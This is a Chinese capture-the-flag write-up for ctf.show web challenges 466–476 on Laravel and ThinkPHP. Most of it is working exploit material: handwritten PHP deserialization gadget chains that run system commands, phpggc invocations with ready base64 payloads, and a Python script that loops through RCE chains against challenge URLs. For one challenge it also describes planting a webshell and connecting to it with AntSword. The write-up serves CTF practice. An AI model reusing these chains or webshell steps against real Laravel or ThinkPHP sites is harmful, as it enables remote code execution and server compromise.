web 466

Laravel5.4版本 ，提交数据需要base64编码

代码审计学习—Laravel5.4 - 先知社区 (aliyun.com)

用第二条链子

反序列化格式 /admin/序列化串base64

<?php
namespace Illuminate\Validation {class Validator {public $extensions = [];public function __construct() {$this->extensions = ['' => 'system'];}}
}namespace Illuminate\Broadcasting {use  Illuminate\Validation\Validator;class PendingBroadcast {protected $events;protected $event;public function __construct($cmd){$this->events = new Validator();$this->event = $cmd;}}echo base64_encode(serialize(new PendingBroadcast('cat /flag')));
}
?>

web 467

Laravel5.5版本 提交数据需要base64编码

参考文章：Laravel5.4 反序列化漏洞挖掘 - 先知社区 (aliyun.com)

第三条链子

<?php
namespace Illuminate\Broadcasting
{use  Illuminate\Events\Dispatcher;class PendingBroadcast{protected $events;protected $event;public function __construct($cmd){$this->events = new Dispatcher($cmd);$this->event=$cmd;}}echo base64_encode(serialize(new PendingBroadcast("cat /flag")));
}namespace Illuminate\Events
{class Dispatcher{protected $listeners;public function __construct($event){$this->listeners=[$event=>['system']];}}
}

web 468

Laravel5.5版本 提交数据需要base64编码

我们已经知道原理了，直接工具打吧

从0到1掌握反序列化工具之PHPGGC - 先知社区 (aliyun.com)

查看各种应用各种版本的链子

./phpggc -l

生成链子，这里我们用 RCE3

./phpggc Laravel/RCE3 system "cat /f*"|base64 

生成后发现不行，反序列化结果会被调试页面覆盖

那只能带外了

./phpggc Laravel/RCE3 system "cat /f* >1.txt"|base64 

Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6MTp7czo5OiIAKgBldmVudHMiO086Mzk6IklsbHVtaW5hdGVcTm90aWZpY2F0aW9uc1xDaGFubmVsTWFuYWdlciI6Mzp7czo2OiIAKgBhcHAiO3M6MTQ6ImNhdCAvZiogPjEudHh0IjtzOjE3OiIAKgBkZWZhdWx0Q2hhbm5lbCI7czoxOiJ4IjtzOjE3OiIAKgBjdXN0b21DcmVhdG9ycyI7YToxOntzOjE6IngiO3M6Njoic3lzdGVtIjt9fX0K

然后访问 1.txt 就行了

web469

Laravel5.5版本 提交数据需要base64编码

Laravel RCE3 用不了了，我们用 4

./phpggc Laravel/RCE4 system "cat /f*"|base64

Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MzE6IklsbHVtaW5hdGVcVmFsaWRhdGlvblxWYWxpZGF0b3IiOjE6e3M6MTA6ImV4dGVuc2lvbnMiO2E6MTp7czowOiIiO3M6Njoic3lzdGVtIjt9fXM6ODoiACoAZXZlbnQiO3M6NzoiY2F0IC9mKiI7fQo=

web 470

又出现 debug 页面了。而且还得换 RCE9

./phpggc Laravel/RCE9 system "cat /f* > 1.txt"|base64

Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjU6e3M6MTI6IgAqAGNvbnRhaW5lciI7TjtzOjExOiIAKgBwaXBlbGluZSI7TjtzOjg6IgAqAHBpcGVzIjthOjA6e31zOjExOiIAKgBoYW5kbGVycyI7YTowOnt9czoxNjoiACoAcXVldWVSZXNvbHZlciI7czo2OiJzeXN0ZW0iO31zOjg6IgAqAGV2ZW50IjtPOjM4OiJJbGx1bWluYXRlXEJyb2FkY2FzdGluZ1xCcm9hZGNhc3RFdmVudCI6MTp7czoxMDoiY29ubmVjdGlvbiI7czoxNToiY2F0IC9mKiA+IDEudHh0Ijt9fQo=

然后访问 1.txt

web 471

和上面一样

web 472

Laravel8.1版本 提交数据需要base64编码

写一个脚本遍历所有 rce

import os
import requestsfor i in range(1,20):data=os.popen(f"./phpggc  Laravel/RCE{i} system 'cat /f* >1.txt'|base64").read()url = f"https://36c90604-17a4-483d-b420-c4a064444212.challenge.ctf.show/admin/{data}"requests.get(url)res = requests.get("https://36c90604-17a4-483d-b420-c4a064444212.challenge.ctf.show/1.txt").textif 'ctfshow' in res:print(res)print(f"RCE{i}success!")

python3 attack.py 

web 473

thinkphp5.0.15默认控制器的部分代码，使用默认路由：
public function inject(){$a=request()->get('a/a');db('users')->insert(['username'=>$a]);return 'done';}

快一点吧直接工具梭哈了

web 474

Thinkphp v5.x 远程代码执行漏洞复现及POC集合-CSDN博客

扫这个没有

https://c5996b11-8db9-42d8-a43d-2ac4d7f5e605.challenge.ctf.show/public/index.php

得扫目录

https://c5996b11-8db9-42d8-a43d-2ac4d7f5e605.challenge.ctf.show/public

但是没有回显，写🐎进去

蚁剑连接

web 475

web 476